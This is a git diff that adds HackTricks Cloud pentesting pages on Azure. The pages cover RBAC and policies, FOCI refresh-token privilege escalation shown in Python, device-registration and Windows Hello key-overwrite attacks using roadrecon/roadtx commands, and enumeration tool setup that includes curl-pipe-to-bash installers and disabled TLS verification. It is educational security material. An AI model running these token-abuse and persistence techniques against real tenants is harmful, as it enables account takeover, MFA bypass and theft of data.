+                    "Microsoft.DigitalTwins/operations/read",
+                    "Microsoft.DigitalTwins/digitalTwinsInstances/read",
+                    "Microsoft.DigitalTwins/digitalTwinsInstances/write",
+                    "Microsoft.CostManagement/exports/*"
+                ],
+                "notActions": [
+                    "Astronomer.Astro/register/action",
+                    "Astronomer.Astro/unregister/action",
+                    "Astronomer.Astro/operations/read",
+                    "Astronomer.Astro/organizations/read"
+                ],
+                "dataActions": [],
+                "notDataActions": []
+            }
+        ]
+    }
+}
+```
+
+### Permissions order
+
+* In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**.
+* An explicit **deny role assignment takes precedence** over the role granting the permission.
+
+<figure><img src="../../../.gitbook/assets/image (191).png" alt=""><figcaption><p><a href="https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10">https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10</a></p></figcaption></figure>
+
+### Global Administrator
+
+Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default.
+
+Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\
+This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
+
+<figure><img src="../../../.gitbook/assets/image (349).png" alt=""><figcaption></figcaption></figure>
+
+### Azure Policies
+
+**Azure Policies** are rules that help organizations ensure their resources meet specific standards and compliance requirements. They allow you to **enforce or audit settings on resources in Azure**. For example, you can prevent the creation of virtual machines in an unauthorized region or ensure that all resources have specific tags for tracking.
+
+Azure Policies are **proactive**: they can stop non-compliant resources from being created or changed. They are also **reactive**, allowing you to find and fix existing non-compliant resources.
+
+#### **Key Concepts**
+
+1. **Policy Definition**: A rule, written in JSON, that specifies what is allowed or required.
+2. **Policy Assignment**: The application of a policy to a specific scope (e.g., subscription, resource group).
+3. **Initiatives**: A collection of policies grouped together for broader enforcement.
+4. **Effect**: Specifies what happens when the policy is triggered (e.g., "Deny," "Audit," or "Append").
+
+**Some examples:**
+
+1. **Ensuring Compliance with Specific Azure Regions**: This policy ensures that all resources are deployed in specific Azure regions. For example, a company might want to ensure all its data is stored in Europe for GDPR compliance.
+2. **Enforcing Naming Standards**: Policies can enforce naming conventions for Azure resources. This helps in organizing and easily identifying resources based on their names, which is helpful in large environments.
+3. **Restricting Certain Resource Types**: This policy can restrict the creation of certain types of resources. For example, a policy could be set to prevent the creation of expensive resource types, like certain VM sizes, to control costs.
+4. **Enforcing Tagging Policies**: Tags are key-value pairs associated with Azure resources used for resource management. Policies can enforce that certain tags must be present, or have specific values, for all resources. This is useful for cost tracking, ownership, or categorization of resources.
+5. **Limiting Public Access to Resources**: Policies can enforce that certain resources, like storage accounts or databases, do not have public endpoints, ensuring that they are only accessible within the organization's network.
+6. **Automatically Applying Security Settings**: Policies can be used to automatically apply security settings to resources, such as applying a specific network security group to all VMs or ensuring that all storage accounts use encryption.
+
+Note that Azure Policies can be attached to any level of the Azure hierarchy, but they are **commonly used in the root management group** or in other management groups.
+
+Azure policy json example:
+
+```json
+{
+  "policyRule": {
+    "if": {
+      "field": "location",
+      "notIn": [
+        "eastus",
+        "westus"
+      ]
+    },
+    "then": {
+      "effect": "Deny"
+    }
+  },
+  "parameters": {},
+  "displayName": "Allow resources only in East US and West US",
+  "description": "This policy ensures that resources can only be created in East US or West US.",
+  "mode": "All"
+}
+```
+
+### Permissions Inheritance
+
+In Azure **permissions are can be assigned to any part of the hierarchy**. That includes management groups, subscriptions, resource groups, and individual resources. Permissions are **inherited** by contained **resources** of the entity where they were assigned.
+
+This hierarchical structure allows for efficient and scalable management of access permissions.
+
+<figure><img src="../../../.gitbook/assets/image (26).png" alt=""><figcaption></figcaption></figure>
+
+### Azure RBAC vs ABAC
+
+**RBAC** (role-based access control) is what we have seen already in the previous sections: **Assigning a role to a principal to grant him access** over a resource.\
+However, in some cases you might want to provide **more fined-grained access management** or **simplify** the management of **hundreds** of role **assignments**.
+
+Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\
+You **cannot** explicitly **deny** **access** to specific resources **using conditions**.
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview)
+* [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions)
+* [https://abouttmc.com/glossary/azure-subscription/#:\~:text=An%20Azure%20subscription%20is%20a,the%20subscription%20it%20belongs%20to.](https://abouttmc.com/glossary/azure-subscription/)
+* [https://learn.microsoft.com/en-us/azure/role-based-access-control/overview#how-azure-rbac-determines-if-a-user-has-access-to-a-resource](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview#how-azure-rbac-determines-if-a-user-has-access-to-a-resource)
+* [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md b/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
new file mode 100644
index 0000000000..59ef23f065
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
@@ -0,0 +1,233 @@
+# Az - Tokens & Public Applications
+
+
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implements the OAuth 2.0 authorization framework and the OpenID Connect (OIDC) authentication protocol to manage access to resources.
+
+### OAuth
+
+**Key Participants in OAuth 2.0:**
+
+1. **Resource Server (RS):** Protects resources owned by the resource owner.
+2. **Resource Owner (RO):** Typically an end-user who owns the protected resources.
+3. **Client Application (CA):** An application seeking access to resources on behalf of the resource owner.
+4. **Authorization Server (AS):** Issues access tokens to client applications after authenticating and authorizing them.
+
+**Scopes and Consent:**
+
+* **Scopes:** Granular permissions defined on the resource server that specify access levels.
+* **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes.
+
+**Microsoft 365 Integration:**
+
+* Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications.
+* These applications are deeply integrated and often have interdependent service relationships.
+* To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications.
+* **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l.
+* These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces.
+
+**Client Application Types:**
+
+1. **Confidential Clients:**
+   * Possess their own credentials (e.g., passwords or certificates).
+   * Can **securely authenticate themselves** to the authorization server.
+2. **Public Clients:**
+   * Do not have unique credentials.
+   * Cannot securely authenticate to the authorization server.
+   * **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application.
+
+## Authentication Tokens
+
+There are **three types of tokens** used in OIDC:
+
+* [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default.
+* **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**.
+* **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens).
+  * A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**.
+  * A refresh token is encrypted and only Microsoft can decrypt it.
+  * Getting a new refresh token doesn't revoke the previous refresh token.
+
+{% hint style="warning" %}
+Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**.
+{% endhint %}
+
+### Access Tokens "aud"
+
+The field indicated in the "aud" field is the **resource server** (the application) used to perform the login.
+
+The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token:
+
+{% hint style="danger" %}
+Note that the following are just the APIs supported by `az account get-access-token` but there are more.
+{% endhint %}
+
+<details>
+
+<summary>aud examples</summary>
+
+* **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD).
+  * `https://graph.windows.net/`
+
+- **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more.
+  * `https://management.core.windows.net/ or https://management.azure.com/`
+
+* **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud.
+  * `https://batch.core.windows.net/`
+
+- **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service.
+  * `https://datalake.azure.net/`
+
+* **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content.
+  * `https://rest.media.azure.net`
+
+- **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services.
+  * `https://graph.microsoft.com`
+
+* **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB.
+  * `https://ossrdbms-aad.database.windows.net`
+
+</details>
+
+### Access Tokens Scopes "scp"
+
+The scope of an access token is stored inside the scp key inside the access token JWT. These scopes define what the access token has access to.
+
+If a JWT is allowed to contact an specific API but **doesn't have the scope** to perform the requested action, it **won't be able to perform the action** with that JWT.
+
+### Get refresh & access token example
+
+```python
+# Code example from https://github.com/secureworks/family-of-client-ids-research
+import msal
+import requests
+import jwt
+from pprint import pprint
+from typing import Any, Dict, List
+
+
+# LOGIN VIA CODE FLOW AUTHENTICATION
+azure_cli_client = msal.PublicClientApplication(
+    "04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
+)
+device_flow = azure_cli_client.initiate_device_flow(
+    scopes=["https://graph.microsoft.com/.default"]
+)
+print(device_flow["message"])
+
+# Perform device code flow authentication
+
+azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow(
+    device_flow
+)
+pprint(azure_cli_bearer_tokens_for_graph_api)
+
+
+
+# DECODE JWT
+def decode_jwt(base64_blob: str) -> Dict[str, Any]:
+    """Decodes base64 encoded JWT blob"""
+    return jwt.decode(
+        base64_blob, options={"verify_signature": False, "verify_aud": False}
+    )
+decoded_access_token = decode_jwt(
+    azure_cli_bearer_tokens_for_graph_api.get("access_token")
+)
+pprint(decoded_access_token)
+
+
+# GET NEW ACCESS TOKEN AND REFRESH TOKEN
+new_azure_cli_bearer_tokens_for_graph_api = (
+    # Same client as original authorization
+    azure_cli_client.acquire_token_by_refresh_token( 
+        azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
+        # Same scopes as original authorization
+        scopes=["https://graph.microsoft.com/.default"], 
+    )
+)
+pprint(new_azure_cli_bearer_tokens_for_graph_api)
+```
+
+## FOCI Tokens Privilege Escalation
+
+Previously it was mentioned that refresh tokens should be tied to the **scopes** it was generated with, to the **application** and **tenant** it was generated to. If any of these boundaries is broken, it's possible to escalate privileges as it will be possible to generate access tokens to other resources and tenants the user has access to and with more scopes than it was originally intended.
+
+Moreover, **this is possible with all refresh tokens** in the [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, and social accounts like Facebook and Google) because as the [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) mention: "Refresh tokens are bound to a combination of user and client, but **aren't tied to a resource or tenant**. A client can use a refresh token to acquire access tokens **across any combination of resource and tenant** where it has permission to do so. Refresh tokens are encrypted and only the Microsoft identity platform can read them."
+
+Moreover, note that the FOCI applications are public applications, so **no secret is needed** to authenticate to the server.
+
+Then known FOCI clients reported in the [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) can be [**found here**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
+
+### Get different scope
+
+Following with the previous example code, in this code it's requested a new token for a different scope:
+
+```python
+# Code from https://github.com/secureworks/family-of-client-ids-research
+azure_cli_bearer_tokens_for_outlook_api = (
+    # Same client as original authorization
+    azure_cli_client.acquire_token_by_refresh_token( 
+        new_azure_cli_bearer_tokens_for_graph_api.get(
+            "refresh_token" 
+        ),
+        # But different scopes than original authorization
+        scopes=[
+            "https://outlook.office.com/.default" 
+        ],  
+    )
+)
+pprint(azure_cli_bearer_tokens_for_outlook_api)
+```
+
+### Get different client and scopes
+
+```python
+# Code from https://github.com/secureworks/family-of-client-ids-research
+microsoft_office_client = msal.PublicClientApplication("d3590ed6-52b3-4102-aeff-aad2292ab01c")
+microsoft_office_bearer_tokens_for_graph_api = (
+    # This is a different client application than we used in the previous examples
+    microsoft_office_client.acquire_token_by_refresh_token(
+        # But we can use the refresh token issued to our original client application
+        azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
+        # And request different scopes too
+        scopes=["https://graph.microsoft.com/.default"],
+    )
+)
+# How is this possible?
+pprint(microsoft_office_bearer_tokens_for_graph_api)
+```
+
+## References
+
+* [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-device-registration.md b/pentesting-cloud/azure-security/az-device-registration.md
new file mode 100644
index 0000000000..44e42482b3
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-device-registration.md
@@ -0,0 +1,138 @@
+# Az - Device Registration
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+When a device joins AzureAD a new object is created in AzureAD.
+
+When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt.
+
+Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible.
+
+Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).:
+
+```bash
+dsregcmd /status
+```
+
+After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.**
+
+For more information about what is a PRT check:
+
+{% content-ref url="az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md" %}
+[az-primary-refresh-token-prt.md](az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md)
+{% endcontent-ref %}
+
+### TPM - Trusted Platform Module
+
+The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\
+But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights.
+
+If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys):
+
+{% content-ref url="az-lateral-movement-cloud-on-prem/pass-the-prt.md" %}
+[pass-the-prt.md](az-lateral-movement-cloud-on-prem/pass-the-prt.md)
+{% endcontent-ref %}
+
+## Registering a device with SSO tokens
+
+It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it:
+
+```bash
+# Initialize SSO flow
+roadrecon auth prt-init
+.\ROADtoken.exe <nonce>
+
+# Request token with PRT with PRT cookie
+roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie <cookie>
+
+# Custom pyhton script to register a device (check roadtx)
+registerdevice.py
+```
+
+Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**.
+
+{% hint style="success" %}
+Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**.
+{% endhint %}
+
+{% hint style="danger" %}
+This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
+{% endhint %}
+
+## Overwriting a device ticket
+
+It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A).
+
+<figure><img src="../../.gitbook/assets/image (32).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="danger" %}
+However, this was fixed.
+{% endhint %}
+
+## Overwrite WHFB key
+
+[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
+
+Attack summary:
+
+* It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO
+* It **defeats TPM protection** as the key is **sniffed during the generation** of the new key
+* This also provides **persistence**
+
+<figure><img src="../../.gitbook/assets/image (34).png" alt=""><figcaption></figcaption></figure>
+
+Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph.
+
+Then, it's possible to generate a new key with:
+
+```bash
+roadtx genhellokey -d <device id> -k tempkey.key
+```
+
+and then PATCH the information of the searchableDeviceKey:
+
+<figure><img src="../../.gitbook/assets/image (36).png" alt=""><figcaption></figcaption></figure>
+
+It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check:
+
+{% content-ref url="az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md" %}
+[az-phishing-primary-refresh-token-microsoft-entra.md](az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md)
+{% endcontent-ref %}
+
+<figure><img src="../../.gitbook/assets/image (37).png" alt=""><figcaption></figcaption></figure>
+
+## References
+
+* [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A)
+* [https://www.youtube.com/watch?v=x609c-MUZ\_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
+* [https://www.youtube.com/watch?v=AFay\_58QubY](https://www.youtube.com/watch?v=AFay_58QubY)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-enumeration-tools.md b/pentesting-cloud/azure-security/az-enumeration-tools.md
new file mode 100644
index 0000000000..68629756cf
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-enumeration-tools.md
@@ -0,0 +1,160 @@
+# Az - Enumeration Tools
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Install PowerShell in Linux
+
+{% hint style="success" %}
+In linux you will need to install PowerShell Core:
+
+```bash
+sudo apt-get update
+sudo apt-get install -y wget apt-transport-https software-properties-common
+
+# Ubuntu 20.04
+wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
+
+# Update repos
+sudo apt-get update
+sudo add-apt-repository universe
+
+# Install & start powershell
+sudo apt-get install -y powershell
+pwsh
+
+# Az cli
+curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
+```
+{% endhint %}
+
+## Install PowerShell in MacOS
+
+Instructions from the [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
+
+1. Install `brew` if not installed yet:
+
+```bash
+/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
+```
+
+2. Install the latest stable release of PowerShell:
+
+```sh
+brew install powershell/tap/powershell
+```
+
+3. Run PowerShell:
+
+```sh
+pwsh
+```
+
+4. Update:
+
+```sh
+brew update
+brew upgrade powershell
+```
+
+## Main Enumeration Tools
+
+### az cli
+
+[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is a cross-platform tool written in Python for managing and administering (most) Azure and Entra ID resources. It connects to Azure and executes administrative commands via the command line or scripts.
+
+Follow this link for the [**installation instructions¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
+
+Commands in Azure CLI are structured using a pattern of: `az <service> <action> <parameters>`
+
+#### Debug | MitM az cli
+
+Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
+
+```bash
+az account management-group list --output table --debug
+```
+
+In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
+
+{% tabs %}
+{% tab title="Bash" %}
+```bash
+export ADAL_PYTHON_SSL_NO_VERIFY=1
+export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
+export HTTPS_PROXY="http://127.0.0.1:8080"
+export HTTP_PROXY="http://127.0.0.1:8080"
+
+# If this is not enough
+# Download the certificate from Burp and convert it into .pem format
+# And export the following env variable
+openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
+export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
+```
+{% endtab %}
+
+{% tab title="PS" %}
+```bash
+$env:ADAL_PYTHON_SSL_NO_VERIFY=1
+$env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
+$env:HTTPS_PROXY="http://127.0.0.1:8080"
+$env:HTTP_PROXY="http://127.0.0.1:8080"
+```
+{% endtab %}
+{% endtabs %}
+
+### Az PowerShell
+
+Azure PowerShell is a module with cmdlets for managing Azure resources directly from the PowerShell command line.
+
+Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
+
+Commands in Azure PowerShell AZ Module are structured like: `<Action>-Az<Service> <parameters>`
+
+#### Debug | MitM Az PowerShell
+
+Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
+
+```bash
+Get-AzResourceGroup -Debug
+```
+
+In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can set the env variables `HTTPS_PROXY` and `HTTP_PROXY` according to the [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
+
+### Microsoft Graph PowerShell
+
+Microsoft Graph PowerShell is a cross-platform SDK that enables access to all Microsoft Graph APIs, including services like SharePoint, Exchange, and Outlook, using a single endpoint. It supports PowerShell 7+, modern authentication via MSAL, external identities, and advanced queries. With a focus on least privilege access, it ensures secure operations and receives regular updates to align with the latest Microsoft Graph API features.
+
